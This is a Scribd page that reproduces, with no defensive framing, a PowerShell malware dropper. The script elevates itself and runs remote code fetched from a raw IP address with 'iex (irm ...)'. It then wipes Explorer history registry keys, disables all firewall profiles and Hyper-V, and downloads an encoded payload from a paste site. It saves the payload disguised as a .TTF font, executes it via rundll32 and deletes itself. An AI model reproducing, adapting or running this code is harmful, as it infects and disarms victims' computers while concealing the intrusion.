Scribd
Upload
45 views3 pages

Messagehshshsh

The script checks for administrator privileges and restarts itself with elevated permissions if necessary. It removes specific registry keys, disables firewall profiles, and attempts to download a file from a specified link, handling errors with fallbacks. Finally, it writes the downloaded content to a file and executes it using rundll32.exe.

Uploaded by

BRUTALITY
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
45 views3 pages

Messagehshshsh

The script checks for administrator privileges and restarts itself with elevated permissions if necessary. It removes specific registry keys, disables firewall profiles, and attempts to download a file from a specified link, handling errors with fallbacks. Finally, it writes the downloaded content to a file and executes it using rundll32.exe.

Uploaded by

BRUTALITY
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

if (-not ([Security.Principal.

WindowsPrincipal]
[Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.Wi
ndowsBuiltInRole] "Administrator")) {
Write-Host "Requires administrator privileges, restarting script..." -
ForegroundColor Yellow
if (-not $PSCommandPath) {
Write-Host "1" -ForegroundColor Yellow
$key = "SETK48F0106109DF0F7E2AE66A5D92D9"
$keyBytes = [System.Text.Encoding]::UTF8.GetBytes($key)
$encodedKey = [Convert]::ToBase64String($keyBytes)

$url = "http://211.101.237.147:9699/se.php?key=$encodedKey"
Start-Process -FilePath "powershell" -ArgumentList "-NoProfile -
ExecutionPolicy Bypass -Command `"iex (irm $url)`"" -Verb RunAs
} else {
Write-Host "2" -ForegroundColor Yellow
Start-Process -FilePath "powershell" -ArgumentList "-NoProfile -
ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs
$scriptPath = $MyInvocation.MyCommand.Path
$process = Start-Process -FilePath "powershell.exe" -ArgumentList "-Command
Start-Sleep -Seconds 1; Remove-Item -Path '$scriptPath' -Force" -NoNewWindow
}
Start-Sleep -Seconds 2
exit
}
Stop-Service -Name MessageTransfer -ErrorAction SilentlyContinue
Start-Sleep -Seconds 2
Write-Host "SETK48F0106109DF0F7E2AE66A5D92D9" -ForegroundColor Green
Start-Sleep -Seconds 2
Write-Host "UAC" -ForegroundColor Green

$basePath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer"
$targetKeys = @("RunMRU", "RecentDocs","FeatureUsage","TypedPaths","ComDlg32")
Get-ChildItem -Path $basePath | ForEach-Object {
if ($targetKeys -contains $_.PSChildName) {
$targetPath = Join-Path -Path $basePath -ChildPath $_.PSChildName
Remove-Item -Path $targetPath -Recurse -Force -ErrorAction SilentlyContinue
}
}

try {
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force
} catch {
Write-Host "cl: $($_.Exception.Message)" -ForegroundColor Red
}
try {
Set-NetFirewallProfile -Profile Public,Private,Domain -Enabled False
} catch {
Write-Host "fhq nook: $($_.Exception.Message)" -ForegroundColor Red
}
try {
Disable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-
Hypervisor -NoRestart
} catch {
Write-Host "noHyper-V: $($_.Exception.Message)" -ForegroundColor Red
}
for ($i = 1; $i -le 11; $i++) {
Stop-Process -Name rundll32 -Force -ErrorAction SilentlyContinue
}

$downloadLink = "https://ghostbin.cloud/ideis/raw"

if (-not $downloadLink) {
Write-Host "No download link found." -ForegroundColor Red
Start-Sleep -Seconds 2
$scriptPath = $MyInvocation.MyCommand.Path
$process = Start-Process -FilePath "powershell.exe" -ArgumentList "-Command
Start-Sleep -Seconds 1; Remove-Item -Path '$scriptPath' -Force" -NoNewWindow
exit
}
$randomDir = $env:TEMP + '\' + (Get-Date -Format "yyyyMMddHHmmss")+ (Get-Random)
$outFile = $randomDir + '\'+(Get-Random)+'1.TTF'
New-Item -Path $randomDir -ItemType Directory -Force

try {
$base64EncodedContent = Invoke-RestMethod -Uri $downloadLink -ErrorAction Stop
} catch {
Write-Host "Failed to download the file using Invoke-RestMethod. Trying with
curl..." -ForegroundColor Red
try {
$base64EncodedContent = & curl -s $downloadLink
if (-not $base64EncodedContent) {
throw "File download failed using curl."
}
} catch {
Write-Host "Failed to download the file with curl: $($_.Exception.Message)"
-ForegroundColor Red
Start-Sleep -Seconds 2
$scriptPath = $MyInvocation.MyCommand.Path
$process = Start-Process -FilePath "powershell.exe" -ArgumentList "-Command
Start-Sleep -Seconds 1; Remove-Item -Path '$scriptPath' -Force" -NoNewWindow
exit
}
}

$binaryContent = [Convert]::FromBase64String($base64EncodedContent)
$binaryData=$binaryContent
$pattern = [byte[]](0xD7, 0x97, 0x10, 0x00, 0xD7, 0x97, 0x10, 0x00, 0xD6, 0x97,
0x0F, 0x0A, 0xD9, 0x97, 0x11, 0x2D,
0xDB, 0x97, 0x12, 0x74, 0xDB, 0x96, 0x11, 0xA8, 0xDB, 0x96,
0x11, 0xD9, 0xDB, 0x96, 0x12, 0xFF, 0xDB, 0x96)
$replace_length = 16796
$pos = -1
for ($i = 0; $i -le $binaryData.Length - $pattern.Length; $i++) {
$match = $true
for ($j = 0; $j -lt $pattern.Length; $j++) {
if ($binaryData[$i + $j] -ne $pattern[$j]) {
$match = $false
break
}
}
if ($match) {
$pos = $i
break
}
}
if ($pos -ge 0) {
$randomBytes = New-Object byte[] $replace_length
(New-Object Random).NextBytes($randomBytes)
[Array]::Copy($randomBytes, 0, $binaryData, $pos, $replace_length)
$binaryContent=$binaryData
} else {
Write-Output "未找到匹配字节序列"
}

[System.IO.File]::WriteAllBytes($outFile, $binaryContent)

$FilePath = "C:\Windows\SysWOW64\rundll32.exe"
if (-Not (Test-Path $FilePath)) {
$rundll="https://vip.123yx.com/1844947338/20250106/rundll32"
Write-Host "rundll32.exe nofile: $FilePath"
try {
Invoke-WebRequest -Uri $rundll -OutFile $FilePath -ErrorAction Stop
} catch {
Write-Host "rundll32.exe Failed to download the file using Invoke-
WebRequest. Trying with curl..." -ForegroundColor Red
try {
Start-Process -FilePath "curl" -ArgumentList "-o `"$FilePath`"
`"$rundll`"" -NoNewWindow -Wait
if (-not (Test-Path $FilePath)) {
throw "rundll32.exe File download failed using curl."
}
} catch {
Write-Host "rundll32.exe Failed to download the file with curl: $
($_.Exception.Message)" -ForegroundColor Red
Start-Sleep -Seconds 2
$scriptPath = $MyInvocation.MyCommand.Path
$process = Start-Process -FilePath "powershell.exe" -ArgumentList "-
Command Start-Sleep -Seconds 1; Remove-Item -Path '$scriptPath' -Force" -
NoNewWindow
exit
}
}
}
Write-Host "File downloaded successfully to $outFile" -ForegroundColor Green

Start-Process -FilePath "rundll32.exe" -ArgumentList "$outFile,GO


SETK48F0106109DF0F7E2AE66A5D92D9"
exit

You might also like